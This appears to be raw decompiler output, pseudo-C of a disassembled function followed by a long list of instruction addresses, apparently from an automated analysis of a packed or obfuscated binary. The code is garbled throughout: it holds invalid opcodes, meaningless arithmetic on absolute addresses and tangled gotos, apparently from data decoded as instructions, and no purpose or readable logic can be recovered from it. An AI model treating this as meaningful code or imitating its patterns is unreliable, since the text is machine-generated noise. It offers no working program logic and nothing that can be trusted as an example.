																																																									 *_t247 =  *_t247 + _t247;
																																																									 *((intOrPtr*)(_t247 + _t247)) =  *((intOrPtr*)(_t247 + _t247)) + _t247;
																																																									 *_t247 =  *_t247 + _t247;
																																																									 *_t247 =  *_t247 + _t247;
																																																									 *_t247 =  *_t247 + _t247;
																																																									L399:
																																																									_t247 = _t247;
																																																									 *_t247 =  *_t247 + _t247;
																																																									 *_t273 =  *_t273 + _t292;
																																																									_t281 = _t281 + 1;
																																																									 *_t247 =  *_t247 + _t247;
																																																									_t247 = _t247 + 0xc4;
																																																									 *_t247 =  *_t247 + _t247;
																																																									if ( *_t247 != 0) goto L389;
																																																									L402:
																																																									_t281 = 0x1c40000;
																																																								} else {
																																																									if (_t553 < 0) goto L398;
																																																									_push(0x564c7167);
																																																								}
																																																							} else {
																																																								_t292 = _t292 ^  *[ss:0x58773952];
																																																								_t533 = _t292;
																																																								goto L339;
																																																							}
																																																						}
																																																					}
																																																				}
																																																			}
																																																		}
																																																	}
																																																}
																																															}
																																														} else {
																																															_pop(_t247);
																																															L300:
																																															_push(_t292);
																																															if(_t514 >= 0) {
																																																L317:
																																																asm("arpl [edi+0x46], cx");
																																															} else {
																																																L301:
																																																_pop(_t247);
																																																_t285 =  *(_t247 + 0x69) * 0x00000074 ^  *(_t273 + 0x4a);
																																																if(_t285 != 0) {
																																																	_t281 = _t285 - 1;
																																																	if(_t281 >= 0) {
																																																		_t292 = _t292 + 1;
																																																		_t308 = _t308 - 1;
																																																		_t247 = _t247 ^  *(_t273 + 0x70);
																																																		_t538 =  *((intOrPtr*)(_t292 + 0x62)) - _t292;
																																																		L349:
																																																		if(_t538 != 0) {
																																																			_t293 = _t292 + 1;
																																																		} else {
																																																			_t321 =  &_v1;
																																																			if (_t321 >= 0) goto L375;
																																																			L351:
																																																			_t308 = _t308 - 1;
																																																			_t540 = _t308;
																																																		}
																																																	} else {
																																																		asm("bound ebp, [ecx+0x59]");
																																																		_t273 =  *(_t281 + 0x7a) * 0x597c586b;
																																																		_t527 = _t273;
																																																	}
																																																} else {
																																																	asm("outsd");
																																																	_t281 = _t285 + 1;
																																																	asm("outsd");
																																																	_t336 = _t336 + 1;
																																																	if (_t281 < 0) goto L321;
																																																	L303:
																																																	_push(_t247);
																																																}
																																															}
																																														}
																																													}
																																												}
																																											} else {
																																												if (_t496 > 0) goto L280;
																																												_t276 = _t273 - 1;
																																											}
																																										} else {
																																											if (_t481 <= 0) goto L258;
																																											L239:
																																											_t302 = _t292 - 1;
																																										}
																																									}
																																								}
																																							}
																																						}
																																					} else {
																																						_t273 = _t273 + 1;
																																						_t452 = _t273;
																																					}
																																				}
																																			}
																																		}
																																	}
																																}
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								} else {
																									asm("bound edi, [ecx]");
																								}
																							} else {
																								_t336 = _t336 + 1 - 1;
																								_t321 =  &_v1;
																								_t416 = _t321;
																								_push(_t281);
																								_push(_t321);
																								if(_t416 >= 0) {
																									L143:
																									_t273 = _t278 + 1;
																									_t292 = _t292 + 1;
																									_t247 = _t247 ^ 0x00000065;
																									L144:
																									asm("aaa");
																									if ( *(_t247 + 0x46) - _t308 > 0) goto L175;
																									asm("outsb");
																								} else {
																									if (_t416 < 0) goto L140;
																									_push(_t321);
																								}
																							}
																						}
																					}
																				}
																			}
																		}
																	} else {
																		_push(_t247);
																		L76:
																		_t336 = _t336 ^ _a110;
																		_t321 =  &_a1;
																		_t247 = _t247 - 1;
																		goto L77;
																	}
																} else {
																	L62:
																	_pop(_t292);
																	asm("arpl [edx+0x46], bp");
																	_push(0x4d);
																	goto L63;
																}
															}
														} else {
															L39:
															if(_t370 > 0) {
																goto L63;
															} else {
																if(_t370 > 0) {
																	L50:
																	_push(0x34);
																	if(_t376 > 0) {
																		L77:
																		_t247 = _t247 ^ 0x00000075;
																		if (_t247 > 0) goto L96;
																		L78:
																		_t273 = _t273 ^  *_t247;
																	} else {
																		_t273 =  *(_t247 + 0x45) * 0x3941374a;
																		_t292 = _t292 ^  *(_t273 + 0x4b + _t308 * 2);
																	}
																} else {
																	_t321 =  &_a1;
																	_push(_t336);
																	_push(_t321);
																	_t247 = _t247 ^ 0x50777507;
																	_t308 = _t308 - 0x00000001 ^  *(_t281 + 0x76);
																	L42:
																	_t18 = _t315 + 0x72;
																	 *_t18 =  *(_t315 + 0x72) ^ _t321;
																	_t372 =  *_t18;
																	if (_t372 < 0) goto L59;
																	L44:
																	_t315 = _t315 + 1;
																}
															}
														}
													}
												} else {
													_push(_t273);
													goto L14;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				 *_t250 =  *_t250 + _t250;
				 *_t315 =  *_t315 + _t281;
				_pop(ds);
				_t322 = _t321 | _t281;
				 *(_t250 + 0xcd4c01) =  *(_t250 + 0xcd4c01) & _t308;
				_t167 = _t250 + 0x69 + _t322 * 2;
				 *_t167 =  *(_t250 + 0x69 + _t322 * 2) & 0xb400000e;
				_t575 =  *_t167;
				if(_t575 >= 0) {
					L410:
					_a111 = _a111 & _t281;
					asm("adc [cs:0x4240a0d], cl");
					_t250 = 0x7a;
					_pop(_t322);
					asm("cld");
					_t281 = _t281 & 0xb400000e;
					goto L411;
				} else {
					if(_t575 >= 0) {
						_t173 = _t308 + 0x67;
						 *_t173 =  *((intOrPtr*)(_t308 + 0x67)) + _t281;
						if( *_t173 >= 0) {
							asm("insd");
							 *(_t273 + 0x61) =  *(_t273 + 0x61) & _t250;
							_t177 = _t315 + 0x6e;
							 *_t177 =  *((intOrPtr*)(_t315 + 0x6e)) + _t281;
							asm("outsd");
							if( *_t177 != 0) {
								asm("bound esp, [ebp+0x20]");
								 *0xFFFFFFFFB4000083 =  *((intOrPtr*)(0xffffffffb4000083)) + 0xb400000e;
								asm("outsb");
								 *(_t281 + 0x6e) =  *(_t281 + 0x6e) & _t281;
								 *(_t250 + _t250 + 0x4f) =  *(_t250 + _t250 + 0x4f) & _t250;
								_push(_t273);
								goto L410;
							}
							L411:
							asm("aad 0x3e");
							 *0x8833fd03 = _t250;
							asm("int 0x86");
							asm("aas");
							 *_t308 =  *_t308 + _t281;
							asm("aaa");
							_t336 = _t336 + 1;
							_push(ss);
							_t250 =  *0x8833fd03 +  *_t308;
							_t281 = _t281 & _t273 ^ _t308;
							_t190 = _t250 + _t250;
							 *_t190 = _t273;
							asm("invalid");
							asm("invalid");
							asm("cld");
							_t273 =  *0x3b080f00;
							 *0x3b080f00 =  *_t190;
							_a1144459010 = _a1144459010 ^ _t273;
							asm("adc [esi+0xf003a82], eax");
						}
						asm("aaa");
						 *((intOrPtr*)(_t315 + 0x20070021)) =  *((intOrPtr*)(_t315 + 0x20070021)) + _t250;
						_t197 = _t273;
						_t273 = _t281;
						_t281 = _t197;
					}
				}
				_pop(es);
				asm("lodsd");
				_push(_t322);
				 *((intOrPtr*)(_t273 + 0x7024e87)) =  *((intOrPtr*)(_t273 + 0x7024e87)) - _t273;
				asm("insd");
				_t252 = _t250 +  *_t308;
				asm("lodsd");
				_push(_t322);
				do {
					asm("xlatb");
					_push(_t252);
					_t323 =  &_a1;
					 *_t252 =  *_t252 + _t252;
					 *_t315 =  *_t315 + _t252;
					 *_t252 =  *_t252 & _t252;
					asm("pushfd");
					asm("sti");
					_t281 = _t281 - 1;
					_pop(_t309);
					asm("loopne 0x2");
					 *0xb400000e =  *0xb400000e + _t252;
					 *_t273 =  *_t273 + _t281;
					 *_t315 =  *_t315 + _t281;
					asm("adc [eax], al");
					 *_t281 =  *_t281 ^ _t281;
				} while ( *_t281 < 0);
				asm("adc eax, [edx]");
				 *_t273 =  *_t273 + _t252;
				asm("adc [0x80400180], dh");
				 *_t252 =  *_t252 | _t252;
				 *(_t315 + 0x20581) =  *(_t315 + 0x20581) | 0x00000018;
				 *0x87078100 =  *0x87078100 + _t252;
				_t254 = _t252 +  *_t252 + 1;
				asm("adc eax, 0xa60303");
				asm("adc eax, 0x85400002");
				 *_t254 =  *_t254 + _t254;
				asm("aas");
				 *((intOrPtr*)(_t281 + _t254 * 4)) =  *((intOrPtr*)(_t281 + _t254 * 4)) + 0xb400000e;
				do {
					asm("adc eax, 0x8820386");
					 *_t315 =  *_t315 | 0x00000003;
					 *((intOrPtr*)(_t309 + _t315 * 2)) =  *((intOrPtr*)(_t309 + _t315 * 2)) + _t273;
					asm("adc [ecx], al");
					 *_t254 =  *_t254 + _t273;
					 *((intOrPtr*)(_t254 + 0x14f005)) =  *((intOrPtr*)(_t254 + 0x14f005)) + _t254;
					 *0xFFFFFFFFB4152010 =  *0xFFFFFFFFB4152010 | _t281;
					asm("sldt word [eax]");
					_t254 =  *0x1c000175;
					asm("aaa");
					asm("adc [edi], cl");
					_push(ss);
					_t222 = _t254 - 0x13fe8fad;
					 *_t222 =  *(_t254 - 0x13fe8fad) | _t254;
					_t588 =  *_t222;
					asm("adc al, 0x10");
				} while (_t588 == 0);
				if(_t588 < 0) {
					L425:
					asm("adc [ebx], al");
					_t257 = 0;
					_t315 = _t323;
					 *0xFFFFFFFFFFFFFFC2 =  *0xFFFFFFFFFFFFFFC2 << 0xce;
					goto L426;
				} else {
					asm("rol byte [esi], 0xab");
					 *[cs:edi] =  *[cs:edi] + _t273;
					 *_t309 =  *_t309 << 7;
					 *0xb400000e =  *0xb400000e >> 1;
					_t257 = _t254 | 0x0000200b;
					while(1) {
						 *_t257 =  *_t257 + _t257;
						asm("pushad");
						 *[cs:edx+0x64] =  *[cs:edx+0x64] + 0xb400000e;
						asm("popad");
						if( *[cs:edx+0x64] == 0) {
							break;
						}
						 *_t257 =  *_t257 + _t257;
						asm("into");
						asm("salc");
						_t281 = _t281 - 1;
						 *_t315 =  *_t315 + _t257;
						 *_t315 =  *_t315 >> 0x4a;
						asm("rol byte [ecx], 0x34");
						 *((intOrPtr*)(_t257 + _t257 * 8)) =  *((intOrPtr*)(_t257 + _t257 * 8)) + _t323;
						 *_t273 = 0xb400000e +  *_t273;
						_t273 = _t273 + 1;
						_t257 = _t257 + 2;
						asm("fcom dword [eax+0x55]");
						asm("ror byte [ebx-0x70], 0xc0");
						_pop(es);
						_push(es);
						 *_t309 =  *_t309 + _t257;
						if( *_t309 <= 0) {
							continue;
						} else {
							_t259 = _t257;
							_t593 = _t259;
							asm("loopne 0x30");
							if(_t593 < 0) {
								L436:
								 *_t273 =  *_t273 | _t323;
								return _t259;
							} else {
								if(_t593 < 0) {
									if(0xb400000e ==  *_t281) {
										_t259 = _t259 + 1;
										_t281 = _t281 + 1;
										goto L434;
									}
									goto L435;
								} else {
									 *_t315 =  *_t315 + 0xc2;
									 *_t315 =  *_t315 + _t281;
									 *_t273 =  *_t273 + _t259;
									_t232 = _t259 + 0x2e;
									 *_t232 =  *(_t259 + 0x2e) | _t259;
									if( *_t232 < 0) {
										L434:
										_t281 = 0xb400000e + _t281;
										L435:
										asm("int1");
										_t259 =  *_t259 & 0x000000ff;
										_t281 =  *_t281 & 0x000000ff;
										goto L436;
									} else {
										asm("gs insb");
										asm("outsd");
										 *0xb400000e =  *0xb400000e + _t281;
										 *_t315 =  *_t315 >> 0;
										asm("rol byte [eax], 0x5");
										 *_t259 =  *_t259 >> 0xb2;
										asm("into");
										 *0xFFFFFFFFB400003C =  *0xFFFFFFFFB400003C | _t259;
										asm("bound esi, [ebx+0x73]");
										asm("wait");
										goto L425;
									}
								}
							}
						}
						goto L437;
					}
					L426:
					_t295 = 0xb400000e + _t257;
					asm("into");
					 *(_t309 - 0x80) =  *(_t309 - 0x80) | _t309;
					 *((intOrPtr*)(_t295 + 9)) =  *((intOrPtr*)(_t295 + 9)) - _t257;
					asm("aas");
					_t244 = _t309 + 0x10;
					 *_t244 =  *((intOrPtr*)(_t309 + 0x10)) + _t309;
					_t600 =  *_t244;
					if(_t600 > 0) {
						L430:
						asm("rcr byte [ebp-0x3d], 0x8b");
						return _t257;
					}
					if(_t600 <= 0) {
						asm("adc [ebp], dl");
						if(_a4 == 0) {
							 *_t273 =  *_t273 + _t295;
							goto L430;
						}
					}
					return _t257;
				}
				L437:
			}

0x0042a4fe
0x0042a4fe
0x0042a4fe
0x0042a4fe
0x0042a4fe
0x0042a4ff
0x0042a500
0x0042a56d
0x0042a56f
0x0042a572
0x0042a574
0x0042a574
0x0042a577
0x0042a578
0x00000000
0x0042a57a
0x0042a57a
0x0042a57b
0x0042a57c
0x00000000
0x0042a57e
0x0042a57e
0x00000000
0x0042a57e
0x0042a57c
0x0042a502
0x0042a502
0x0042a503
0x0042a508
0x0042a509
0x0042a565
0x0042a50b
0x0042a50d
0x0042a50e
0x0042a50e
0x0042a510
0x0042a511
0x0042a57f
0x0042a580
0x0042a580
0x00000000
0x0042a513
0x0042a513
0x0042a556
0x0042a556
0x0042a515
0x0042a515
0x0042a516
0x0042a516
0x0042a517
0x0042a551
0x0042a551
0x0042a552
0x0042a553
0x0042a5d0
0x0042a5d0
0x0042a5d3
0x00000000
0x0042a5d5
0x0042a5d7
0x0042a5d9
0x0042a5e0
0x0042a5e1
0x0042a5e4
0x0042a5e5
0x00000000
0x0042a5e7
0x0042a5e7
0x0042a5e7
0x0042a63a
0x0042a63a
0x0042a5e9
0x0042a5e9
0x0042a5ee
0x00000000
0x00000000
0x00000000
0x00000000
0x0042a5ee
0x0042a5e7
0x0042a5e5
0x0042a554
0x0042a554
0x0042a554
0x0042a555
0x00000000
0x0042a555
0x0042a519
0x0042a519
0x0042a581
0x0042a581
0x0042a582
0x00000000
0x0042a584
0x0042a584
0x0042a585
0x0042a586
0x00000000
0x0042a588
0x0042a588
0x0042a589
0x0042a58c
0x0042a58d
0x0042a58d
0x0042a58d
0x00000000
0x0042a58d
0x0042a586
0x0042a51b
0x0042a51b
0x0042a51c
0x0042a51d
0x0042a51f
0x0042a521
0x0042a525
0x0042a526
0x0042a527
0x0042a58f
0x0042a58f
0x0042a601
0x0042a602
0x0042a605
0x0042a605
0x0042a607
0x0042a678
0x0042a6ec
0x0042a6ed
0x00000000
0x0042a6ef
0x0042a6ef
0x00000000
0x0042a6ef
0x0042a679
0x0042a679
0x0042a6f0
0x0042a6f2
0x0042a6f2
0x0042a6f3
0x0042a6f4
0x00000000
0x00000000
0x00000000
0x00000000
0x0042a67a
0x0042a67a
0x0042a67a
0x0042a67a
0x0042a67a
0x0042a679
0x0042a609
0x0042a609
0x00000000
0x0042a60b
0x0042a60b
0x0042a60c
0x00000000
0x0042a60c
0x0042a609
0x0042a591
0x0042a591
0x0042a592
0x0042a529
0x0042a529
0x0042a52b
0x0042a530
0x0042a532
0x0042a533
0x00000000
0x0042a535
0x0042a536
0x0042a537
0x0042a538
0x0042a539
0x0042a53a
0x0042a53c
0x0042a53d
0x0042a540
0x0042a541
0x0042a542
0x0042a546
0x0042a547
0x0042a54b
0x0042a54b
0x0042a54b
0x0042a54e
0x0042a5a7
0x0042a5a8
0x0042a5a8
0x0042a5a9
0x0042a624
0x0042a625
0x0042a626
0x0042a626
0x0042a627
0x0042a628
0x0042a629
0x0042a629
0x00000000
0x0042a62a
0x0042a62a
0x0042a62a
0x0042a5ab
0x0042a5ab
0x0042a5ac
0x0042a5b1
0x0042a5b4
0x0042a5b5
0x0042a5b6
0x0042a60d
0x0042a60d
0x0042a60e
0x0042a614
0x0042a615
0x0042a616
0x0042a617
0x0042a670
0x0042a619
0x0042a619
0x0042a61a
0x0042a61b
0x0042a61c
0x0042a64e
0x0042a6a2
0x0042a6a2
0x0042a6dd
0x0042a6e1
0x00000000
0x0042a6e3
0x0042a6e3
0x0042a6e4
0x00000000
0x0042a6e4
0x0042a6a4
0x0042a6a4
0x0042a6a5
0x0042a723
0x0042a724
0x0042a726
0x00000000
0x0042a6a7
0x0042a6aa
0x0042a6aa
0x0042a6ab
0x0042a6e5
0x0042a6e5
0x0042a6ad
0x0042a6ad
0x0042a6ae
0x0042a6af
0x0042a6b3
0x0042a6b6
0x0042a6b7
0x0042a6ba
0x0042a6ba
0x0042a6bb
0x0042a727
0x0042a727
0x0042a72a
0x0042a72d
0x0042a734
0x00000000
0x0042a736
0x0042a736
0x0042a736
0x00000000
0x0042a736
0x0042a6bd
0x0042a6bd
0x0042a6be
0x0042a6f6
0x0042a6f6
0x0042a769
0x0042a769
0x00000000
0x0042a6f8
0x0042a6f8
0x0042a751
0x0042a751
0x0042a752
0x0042a753
0x0042a754
0x0042a757
0x0042a75a
0x00000000
0x0042a75c
0x0042a75c
0x0042a75f
0x0042a764
0x0042a764
0x0042a765
0x0042a7e0
0x0042a7e0
0x0042a767
0x0042a767
0x00000000
0x00000000
0x00000000
0x00000000
0x0042a767
0x0042a765
0x0042a6fa
0x0042a6fa
0x0042a74b
0x0042a74c
0x0042a74d
0x00000000
0x0042a6fc
0x0042a6fc
0x0042a6fd
0x0042a6fe
0x0042a6ff
0x0042a703
0x0042a704
0x0042a705
0x0042a706
0x0042a706
0x0042a707
0x0042a74f
0x0042a74f
0x0042a750
0x00000000
0x0042a709
0x0042a709
0x0042a70b
0x0042a70e
0x00000000
0x0042a710
0x0042a710
0x0042a711
0x0042a76a
0x0042a76a
0x0042a713
0x0042a713
0x0042a713
0x0042a715
0x0042a716
0x0042a716
0x0042a711
0x0042a70e
0x0042a707
0x0042a6fa
0x0042a6f8
0x0042a6c0
0x0042a6c0
0x0042a6c1
0x0042a6c2
0x0042a6c2
0x0042a6c3
0x0042a71b
0x0042a790
0x0042a790
0x0042a80e
0x0042a80e
0x0042a811
0x00000000
0x0042a792
0x0042a792
0x0042a793
0x0042a794
0x0042a795
0x0042a797
0x0042a808
0x0042a808
0x0042a799
0x0042a799
0x0042a79a
0x0042a812
0x0042a812
0x0042a888
0x00000000
0x0042a813
0x0042a813
0x0042a813
0x0042a79c
0x0042a79d
0x0042a79e
0x0042a7a0
0x0042a7a0
0x0042a7a1
0x0042a7a6
0x0042a7a7
0x0042a7aa
0x0042a7ab
0x0042a820
0x0042a820
0x0042a821
0x0042a822
0x0042a823
0x0042a823
0x00000000
0x0042a7ad
0x0042a7ad
0x0042a7ae
0x0042a7ae
0x0042a7b1
0x0042a7b3
0x0042a7b4
0x0042a7b5
0x0042a830
0x0042a830
0x0042a831
0x0042a832
0x0042a834
0x00000000
0x0042a7b7
0x0042a7b7
0x0042a81b
0x0042a81c
0x0042a81d
0x00000000
0x0042a81f
0x0042a81f
0x00000000
0x0042a81f
0x0042a7b9
0x0042a7b9
0x0042a835
0x0042a835
0x00000000
0x0042a7bb
0x0042a7bb
0x0042a7bb
0x0042a7bc
0x0042a7bd
0x0042a800
0x0042a801
0x0042a801
0x0042a802
0x0042a836
0x0042a836
0x0042a838
0x00000000
0x0042a83a
0x0042a83a
0x0042a83b
0x00000000
0x0042a83b
0x0042a804
0x0042a804
0x00000000
0x0042a806
0x0042a806
0x0042a807
0x00000000
0x0042a807
0x0042a804
0x0042a7bf
0x0042a7bf
0x0042a7c0
0x0042a7c1
0x0042a7c2
0x0042a7c3
0x0042a7c8
0x0042a7c8
0x0042a7cb
0x0042a824
0x0042a824
0x0042a825
0x00000000
0x0042a827
0x0042a827
0x00000000
0x0042a829
0x0042a829
0x0042a829
0x0042a82a
0x00000000
0x0042a82c
0x0042a82c
0x00000000
0x0042a82e
0x0042a82e
0x00000000
0x0042a82f
0x0042a82c
0x0042a82a
0x0042a827
0x0042a7cd
0x0042a7cd
0x0042a83c
0x0042a83c
0x0042a83d
0x0042a83e
0x00000000
0x0042a7cf
0x0042a7cf
0x0042a7d0
0x0042a840
0x0042a840
0x0042a843
0x0042a844
0x0042a847
0x0042a848
0x0042a849
0x0042a84c
0x0042a84d
0x0042a84e
0x0042a84f
0x0042a850
0x0042a851
0x0042a88b
0x0042a88b
0x0042a88c
0x0042a88c
0x0042a88d
0x00000000
0x0042a88f
0x0042a88f
0x0042a892
0x0042a893
0x0042a894
0x0042a8ed
0x0042a8ee
0x0042a8ef
0x0042a8f2
0x0042a8f4
0x0042a8f5
0x0042a8f6
0x0042a8f7
0x0042a8fc
0x0042a8fc
0x0042a8fc
0x00000000
0x0042a896
0x0042a896
0x00000000
0x0042a898
0x0042a898
0x0042a899
0x0042a89a
0x0042a89b
0x0042a89c
0x0042a89c
0x0042a89d
0x0042a89f
0x00000000
0x0042a89f
0x0042a896
0x0042a894
0x0042a853
0x0042a854
0x0042a854
0x00000000
0x0042a854
0x0042a7d2
0x0042a7d2
0x0042a7d3
0x0042a7d4
0x0042a7d5
0x0042a7d6
0x0042a7d7
0x0042a80a
0x0042a80b
0x00000000
0x0042a80d
0x0042a80d
0x00000000
0x0042a80d
0x0042a7d9
0x0042a7d9
0x0042a7d9
0x0042a7da
0x0042a7dc
0x0042a7dd
0x0042a85a
0x0042a85a
0x0042a85b
0x0042a85b
0x0042a85c
0x0042a8a4
0x0042a8a7
0x0042a8a7
0x0042a925
0x0042a925
0x0042a926
0x0042a928
0x00000000
0x0042a92a
0x0042a92a
0x0042a92b
0x0042a92f
0x00000000
0x0042a931
0x0042a931
0x0042a932
0x0042a932
0x0042a933
0x0042a934
0x00000000
0x0042a937
0x0042a937
0x0042a939
0x0042a93a
0x0042a93b
0x0042a93c
0x0042a93d
0x00000000
0x0042a93d
0x0042a934
0x0042a92f
0x0042a8aa
0x0042a8aa
0x0042a8ab
0x0042a8fd
0x0042a8fd
0x0042a8fe
0x0042a8fe
0x0042a8ad
0x0042a8ad
0x0042a904
0x0042a905
0x00000000
0x0042a907
0x0042a907
0x0042a908
0x00000000
0x0042a90a
0x0042a90e
0x0042a90f
0x0042a910
0x0042a910
0x0042a911
0x00000000
0x0042a913
0x0042a913
0x00000000
0x00000000
0x00000000
0x00000000
0x0042a913
0x0042a911
0x0042a908
0x0042a8af
0x0042a8af
0x0042a915
0x0042a915
0x0042a916
0x0042a918
0x0042a919
0x0042a91d
0x0042a924
0x00000000
0x0042a8b1
0x0042a8b1
0x0042a8b3
0x0042a8b3
0x0042a8b4
0x0042a8b6
0x00000000
0x0042a8b6
0x0042a8af
0x0042a8ad
0x0042a8ab
0x0042a85e
0x0042a85e
0x0042a85f
0x0042a863
0x0042a864
0x0042a865
0x0042a866
0x0042a867
0x0042a867
0x0042a868
0x0042a8d7
0x0042a8d7
0x0042a8db
0x00000000
0x0042a86a
0x0042a86a
0x0042a8b7
0x0042a8b7
0x0042a8b8
0x0042a8bd
0x0042a8bf
0x0042a8c6
0x0042a8c8
0x0042a8cb
0x0042a8cc
0x0042a8ce
0x0042a8cf
0x0042a8d1
0x0042a8d4
0x0042a93e
0x0042a93e
0x0042a93f
0x0042a93f
0x0042a940
0x0042a940
0x0042a941
0x0042a942
0x0042a943
0x0042a9ad
0x00000000
0x0042a945
0x0042a945
0x00000000
0x0042a947
0x0042a947
0x0042a949
0x0042a949
0x0042a94a
0x0042a94b
0x0042a9b1
0x0042a9b1
0x0042a9b1
0x00000000
0x0042a94d
0x0042a94d
0x0042a9b2
0x0042a9b2
0x00000000
0x0042a9b4
0x0042a9b4
0x0042a9b7
0x00000000
0x0042a9b9
0x0042a9b9
0x0042a9ba
0x00000000
0x0042a9bc
0x0042a9bc
0x00000000
0x00000000
0x00000000
0x00000000
0x0042a9bc
0x0042a9ba
0x0042a9b7
0x0042a94f
0x0042a94f
0x0042a950
0x00000000
0x0042a952
0x0042a952
0x0042a954
0x0042a955
0x0042a958
0x0042a959
0x00000000
0x0042a95a
0x0042a950
0x0042a94d
0x0042a94b
0x0042a945
0x0042a8d6
0x0042a8d6
0x00000000
0x0042a8d6
0x0042a86c
0x0042a86c
0x0042a8a1
0x0042a8a1
0x0042a86e
0x0042a86e
0x0042a86f
0x0042a86f
0x0042a86f
0x0042a873
0x0042a8dd
0x0042a8dd
0x0042a8de
0x0042a8df
0x0042a8df
0x0042a8e0
0x0042a95e
0x0042a95e
0x0042a962
0x0042a963
0x0042a963
0x0042a964
0x0042a9bf
0x0042a9bf
0x0042a9bf
0x0042a9c6
0x0042a9c7
0x00000000
0x0042a9c9
0x0042a9c9
0x0042a9ca
0x00000000
0x0042a9cc
0x0042a9cc
0x00000000
0x0042a9ce
0x0042a9ce
0x0042a9cf
0x0042a9d0
0x0042aa3d
0x0042aa3e
0x00000000
0x0042a9d2
0x0042a9d2
0x0042a9d4
0x0042a9d5
0x00000000
0x0042a9d5
0x0042a9d0
0x0042a9cc
0x0042a9ca
0x0042a967
0x0042a96a
0x0042a96b
0x0042a96c
0x0042a96d
0x0042a96f
0x0042a970
0x0042a972
0x0042a973
0x0042a974
0x0042a976
0x0042a979
0x0042a97a
0x0042a97b
0x0042a97b
0x0042a97d
0x0042a97e
0x0042a9d7
0x0042a9d8
0x0042a9d9
0x0042a9dc
0x0042a9dd
0x0042a9de
0x00000000
0x0042a980
0x0042a980
0x0042a982
0x0042a983
0x0042a983
0x0042a984
0x0042a984
0x0042a985
0x0042a986
0x0042a988
0x0042a98a
0x0042a98b
0x0042a9f6
0x00000000
0x0042a9f8
0x0042a9f8
0x0042aa2d
0x0042aa2d
0x00000000
0x0042aa2f
0x0042aa2f
0x00000000
0x0042aa31
0x0042aa31
0x00000000
0x0042aa33
0x0042aa34
0x0042aa37
0x0042aa38
0x0042aa39
0x0042aa39
0x0042aa39
0x0042aa39
0x0042aa31
0x0042aa2f
0x0042a9fa
0x0042a9fa
0x0042a9fb
0x0042a9fc
0x0042a9fd
0x0042aa62
0x0042aa63
0x0042aa64
0x0042aa65
0x0042aa66
0x0042aa69
0x0042aa6a
0x0042aa6b
0x0042aa70
0x0042aa71
0x0042aa72
0x00000000
0x0042a9ff
0x0042a9ff
0x0042aa01
0x0042aa01
0x0042aa04
0x0042aa04
0x0042aa3f
0x0042aa3f
0x0042aa40
0x0042aa41
0x0042aa43
0x0042aa06
0x0042aa06
0x00000000
0x0042aa08
0x0042aa08
0x0042aa09
0x0042aa0a
0x0042aa75
0x0042aa75
0x0042aa76
0x0042aae6
0x0042aae6
0x0042aaea
0x00000000
0x0042aa78
0x0042aa78
0x0042aa7d
0x0042aa7e
0x0042aa7f
0x0042aa80
0x0042aa81
0x0042aa82
0x0042aa84
0x0042aa84
0x0042aa85
0x00000000
0x0042aa87
0x0042aa87
0x0042aa87
0x0042aa88
0x0042aabf
0x00000000
0x0042aac1
0x0042aac1
0x0042aac2
0x0042ab3a
0x0042ab41
0x0042ab43
0x0042ab45
0x0042aac4
0x0042aac4
0x0042aac5
0x0042aac6
0x0042aac6
0x0042aac8
0x0042aaca
0x0042aacc
0x0042aad0
0x0042aad2
0x0042aad4
0x0042aad6
0x0042aad8
0x0042aada
0x0042aadc
0x0042aade
0x0042aae0
0x0042aae2
0x00000000
0x0042aae2
0x00000000
0x0042aacc
0x00000000
0x0042aaca
0x0042aac8
0x0042aac2
0x0042aa8a
0x0042aa90
0x0042aa91
0x0042aa92
0x0042aa95
0x0042aa96
0x00000000
0x0042aa98
0x0042aa98
0x00000000
0x0042aa98
0x0042aa96
0x0042aa88
0x0042aa85
0x0042aa0c
0x0042aa0c
0x0042aa5f
0x0042aa5f
0x0042aa60
0x0042aa0e
0x0042aa0e
0x0042aa0f
0x0042aa10
0x0042aa12
0x0042aa13
0x0042aa56
0x00000000
0x0042aa58
0x0042aa58
0x0042aabd
0x0042aabd
0x0042aa5a
0x0042aa5a
0x0042aa5b
0x0042aa5c
0x0042aab0
0x0042aab2
0x0042aab4
0x0042aab5
0x00000000
0x0042aab7
0x0042aab7
0x0042aaba
0x0042aabb
0x0042aabc
0x00000000
0x0042aabc
0x0042aa5e
0x0042aa5e
0x0042aa5e
0x00000000
0x0042aa5e
0x0042aa5c
0x0042aa58
0x0042aa15
0x0042aa15
0x0042aa16
0x0042aa18
0x0042aa18
0x0042aa1a
0x0042aa1a
0x0042aa1b
0x0042aa1c
0x0042aa1d
0x0042aa1d
0x0042aa1e
0x0042aa1f
0x0042aa24
0x0042aa24
0x0042aa25
0x0042aa25
0x0042aa26
0x0042aa99
0x0042aa99
0x0042aa9a
0x0042aa9b
0x0042aa9b
0x0042aa9c
0x0042aa9d
0x0042aa9d
0x0042aa9e
0x0042aa9e
0x0042aa9e
0x0042aa9f
0x0042aaa0
0x0042aaeb
0x0042aaeb
0x0042aaed
0x0042aaed
0x0042aaef
0x0042aaef
0x0042aaf2
0x0042aaf3
0x0042aaf5
0x0042aaf7
0x0042aaf8
0x0042aaf8
0x0042aafb
0x0042aafd
0x0042aaff
0x0042aaff
0x0042ab00
0x0042ab03
0x0042ab03
0x0042ab06
0x0042ab08
0x0042ab0a
0x0042ab0c
0x0042ab0e
0x0042ab11
0x0042ab13
0x0042ab15
0x0042ab17
0x0042ab17
0x0042ab18
0x0042ab1a
0x0042ab1c
0x0042ab1d
0x0042ab1f
0x0042ab21
0x0042ab23
0x0042ab24
0x0042ab24
0x0042aaa2
0x0042aaa2
0x0042aaa3
0x0042aaa3
0x0042aa28
0x0042aa28
0x0042aa28
0x00000000
0x0042aa28
0x0042aa26
0x0042aa13
0x0042aa0c
0x0042aa0a
0x0042aa06
0x0042aa04
0x0042a9fd
0x0042a9f8
0x0042a98d
0x0042a98d
0x0042a98e
0x0042a98e
0x0042a98f
0x0042a9df
0x0042a9df
0x0042a991
0x0042a991
0x0042a995
0x0042a996
0x0042a999
0x0042a9ed
0x0042a9ee
0x0042aa46
0x0042aa4a
0x0042aa4b
0x0042aa4e
0x0042aa51
0x0042aa51
0x0042aaac
0x0042aa53
0x0042aa53
0x0042aa54
0x0042aa55
0x0042aa55
0x0042aa55
0x0042aa55
0x0042a9f0
0x0042a9f0
0x0042a9f1
0x0042a9f1
0x0042a9f1
0x0042a99b
0x0042a99b
0x0042a99c
0x0042a99d
0x0042a99e
0x0042a99f
0x0042a9a0
0x0042a9a0
0x0042a9a0
0x0042a999
0x0042a98f
0x0042a98b
0x0042a97e
0x0042a8e2
0x0042a8e2
0x0042a8e3
